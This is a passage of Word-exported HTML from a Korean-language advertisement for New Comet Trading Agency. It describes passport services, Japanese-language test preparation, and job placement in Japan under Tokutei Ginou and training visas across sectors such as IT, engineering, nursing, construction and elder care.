lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본으로 연수비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">도쿠테이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기노 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Tokutei Ginou) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자로 취업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">희망하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분들 위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">전통문화와</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">풍속을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">익히도록 필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">코스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육 시키고 취직을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> N3, N2(JLPT, JFT, NAT-Test, Top J)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격하는 분들이</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Work Visa </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인</span><o:p></o:p></li></ol><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">번역</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; • IT&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">엔지니어링</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Civil</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Mechanical</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">, EP, EC, Auto CAD&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">)</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">간호지원</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업으로 일본으로 가고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶다면</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해당</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">학당으로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp;New Comet Trading Agency</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다음</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업체를 훈련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Training Visa)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 가고 싶은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자매를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비 &nbsp; &nbsp; 스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">주선하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자동차</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수리</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">집</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">짓기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">식품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌀</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">매장</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운영</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">호텔</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비즈니스</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">의류</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">농업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">물</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">돌봄</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 